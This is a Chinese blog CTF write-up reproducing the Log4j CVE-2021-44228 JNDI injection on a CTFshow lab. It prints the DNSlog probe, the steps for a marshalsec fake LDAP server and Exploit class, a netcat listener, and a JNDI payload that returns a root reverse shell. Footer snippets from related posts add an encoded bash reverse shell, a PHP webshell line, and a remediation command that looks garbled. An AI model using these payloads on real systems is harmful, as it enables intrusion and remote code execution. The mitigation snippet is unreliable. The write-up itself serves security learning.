[Log4j]CVE-2021-44228 CTFshow

已于 2022-03-31 21:59:25 修改
阅读量3.5k 收藏 3
点赞数
分类专栏: CTF 文章标签: web安全
于 2022-03-31 17:50:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/krysyal/article/details/123878454
版权

声明:此文仅供学习记录研究使用,切勿用于非法用途,否则后果自负!
复现参考文档1
复现参考文档2

环境

https://ctf.show/challenges#Log4j%E5%A4%8D%E7%8E%B0-1730
2.0 <= Apache log4j2 <= 2.14.1
简单来说,用户输入会记录在log4j中,而log4j自带lookup功能,格式为${parser:xxx}。如果用户输入lookup会被log4j解析。
jndi是parser的一种,是一种标准的Java命名系统接口,可以连接远程服务,格式为${jndi:schema://url}
ldap是schema的一种,${jndi:ldap://url}会使log4j从url指定的路径下载一段字节流,并将其反序列化为Java对象,作为jndi返回。反序列化过程中,即会执行字节流中包含的程序。
而url的内容可以被控制,我们可以返回恶意代码

验证漏洞存在

使用dnslog平台,查看是否有解析记录
${jndi:ldap://7j0eqi.dnslog.cn}
成功在dnslog平台查看到访问记录,证实这里漏洞存在

在这里插入图片描述

前期准备

vps(有java环境、有安装netcat、python环境)
恶意class文件(可参考:复现参考文档1)
marshalsec-0.0.3-SNAPSHOT-all.jar(用作伪装成LDAP服务器)

编译生成class文件

javac Exploit.java

在这里插入图片描述

在恶意类文件目录下开启http服务


python3 -m http.server 85

在这里插入图片描述>下载marshalsec并运行–伪装ldap服务器

# 启动
java -cp ./marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://vpsip:85/#Exploit" 86
86表示ldap服务监听的端口,不加就是默认1389
复现时要确保使用的端口开放(云服务器安全规则)

在这里插入图片描述

利用

#监听8080
nc -lvvp 8080
#靶机
${jndi:ldap://vpsip:86/Exploit.class}

结果

访问LDAP服务,LDAP服务会去加载85端口http服务下的恶意class文件并执行,然后反弹shell给8080端口

在这里插入图片描述

8080端口获得shell(root权限)

在这里插入图片描述

获取flag
cat /ctfshowflag

在这里插入图片描述

一心一易一
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2021-44228——Vulfocus-Log4j RCE漏洞复现_vulfous中cve-2021-44228
uftdv17136的博客
04-17 248
Apache Log4j2 是 Apache 软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的 重写,并且引入了大量丰富的特。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能 而被广泛的应用于各种常见的 Web 服务中。Apache Log4j 远程代码执行漏洞 :严重。用payload打的时候发现服务器返回404。原因是因为GET数据传输要URL编码。payload GET方式提交。URL编码后提交正常。DNSlog成功回显。
ctfshow—webLog4j复现
最新发布
HAI_WD的博客
09-03 375
利用的话需要有一个vps,poc是:user=${jndi:ldap://0.0.0.0:1389/TomcatBypass/TomcatEcho}这是一个log4j利用的环境,因为log4j本生就是一个jndi漏洞的利用,所以还是基本的jndi利用就可以了。欢迎大家关注我朋友的公众号 皓月当空w 分享漏洞情报以及各种学习资源,技能树,面试题等。log4j的payload是:${jndi:ldap://}这里选取的工具是:JNDIExploit。
ctfshow-Log4j复现-log4j复现
wrypot的博客
08-21 651
另一个终端进入JNDIExploit-1.2-SNAPSHOT.jar所在的目录jndiexploit执行下面命令。1、买VPS,打开mobax进行ssh连接,开两个终端。
Log4j复现
qq_56150805的博客
05-06 210
复现: 1.准备好vps服务器 2.安装ldap服务器 3.开启ldap服务器 4.监听nc -lvnp 1099 5.设置playload 6.cd / 回车 cat ctfshowflag 可见flag: ctfshow{cd64d28e-e9d9-4636-837a-7447c989aa5e}
[漏洞复现]log4j漏洞RCE(CVE-2021-44228)
weixin_43895765的博客
12-15 7539
由于排版问题,详情见个人博客文章???? log4j漏洞RCE(CVE-2021-44228)
ctf bugku Apache Log4j2 RCE解题
YouthBelief的博客
03-08 4348
0x00 环境准备 工具地址 https://github.com/welk1n/JNDI-Injection-Exploit 题目地址 https://ctf.bugku.com/challenges/detail/id/340.html dnslog地址 http://www.dnslog.cn/ 0x01 工具配置 $ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git $ cd JNDI-
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像...
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
Log4j2 RCE漏洞复现
守拙的博客
12-10 4464
最新log4j rce漏洞复现
[DDCTF2018]流量分析
qq_48511129的博客
08-29 514
在流量包中搜索 tcp contains “KEY” 追踪tcp流发现 解密后为 接着查看流量包,发现一张png图片。复制 进行解码图片 发现图片是一串字母 ORC在线识别:https://www.onlineocr.net/zh_hant/ 进行图片识别 可能会存在一些错误。自己对照字母看一遍 根据提示套上ssh私钥格式 -----BEGIN RSA PRIVATE KEY----- MIICXAIBAAKBgQDCm6vZmclJrVH1AAyGuCuSSZ8O+mIQiOUQCvN0HYbj815.
CTF刷题积累经验1 CTFshow web4
qq_43508668的博客
05-09 308
使用php 伪协议发现不行 那么我们进行 日志注入 获取shell ?url=/var/log/nginx/access.log 3.写入一句话木马 <?php @eval($_POST['LCZ']);?> 通过AntSword 连接 拿到flag
每日CTF-week5
苟有恒,必有三更眠,五更起。
04-10 1342
2018.4.2 BugKuCTF-WEB2 原题链接 http://120.24.86.145:8002/web2/ 分析 进url是一个经典的满屏滑稽(/手动斜眼笑); 查看了一下元素,搜索flag,就找到了(/滑稽) flag: KEY{Web-2-bugKssNNikls9100} BugKuCTF-文件上传测试1 原题链接 ht...
BUUCTF-Real
weixin_43821278的博客
03-08 4843
BUUCTF-Real
Log4j2】VNCTF2022 misc-minecraft log4j反弹shell复现
qq_33834637的博客
04-25 4127
##POC hint mc的flag在/flag Misc mc :hint log4j jdk8u261 commons-collections-3.2.1.jar 使用ysoserial.jar生成反序列化数据 java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8yMDkuMTQxLjMyLjc3LzIzMjIzIDA+JjE=}|{base6
sping-boot log4j2小实验
weixin_51566416的博客
12-14 915
最近刷屏的超级漏洞log4j2,复现难度不大,没接触java的同学花点时间上手下,buuctf和bugku两个ctf平台上都出了题,可以刷下。 条件:需要一台可公网访问的机器(比如云服务器)BUUCTF在线评测跳转提示 那么log4j是什么呢? Log4j是Apache的一个开源项目(但并不是),通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息
log4j2复现试验
qq_41696858的博客
12-14 2157
之前bugku有一题是log4j2的复现,然后看到网上一个本地复现的帖子,那就拿这个帖子来做一个简单验证 原文地址:https://bbs.wxctf.com/thread-622-1-1.html 只有两台机器: 受害机ip:192.168.200.130:38080 攻击机:192.168.200.128(burpsuite,jndiexploit,nc) 环境docker拉一下,访问192.168.200.130:38080看见error页面就说明起起来了 说一下可能出错的地方,不要图省事,将dock
apache log4j CVE-2021-44228漏洞怎么解决
06-03
漏洞描述: Apache Log4j 2.x中存在一种命令注入漏洞,攻击者通过构造恶意日志信息,可以在目标服务器上执行任意命令。 解决办法: 1.升级到最新版本 Apache Log4j 2.x发布了修复此漏洞的版本2.17.0,建议用户尽快升级到该版本。 2.使用安全策略文件 在升级之前,可以通过使用安全策略文件来限制日志信息中使用的类和方法,以减少攻击面。可以使用以下命令生成策略文件: ``` java -Dlog4j2.formatMsgNoLookups=true -Dlog4j2.disable.jmx=true -Dlog4j2.benchMillis=100 org.apache.logging.log4j.core.tools.GenerateExtendedLoggerInfo > log4j2-enum-class-loader.policy ``` 然后将策略文件放置在类路径下,例如在Tomcat中,可以将其放置在`$CATALINA_BASE/conf`目录下。 3.禁用Log4j JNDI Lookup功能 如果无法立即升级,可以通过在JVM参数中添加以下选项来禁用Log4j JNDI Lookup功能: ``` -Dlog4j2.formatMsgNoLookups=true ``` 或者在log4j2.xml配置文件中添加以下选项: ``` <Configuration> <properties> <property name="log4j2.formatMsgNoLookups">true</property> </properties> ... </Configuration> ``` 以上是针对Apache Log4j 2.x的解决办法,如果您使用的是其他版本的Log4j,请查看厂商的官方文档或者联系技术支持获取解决办法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值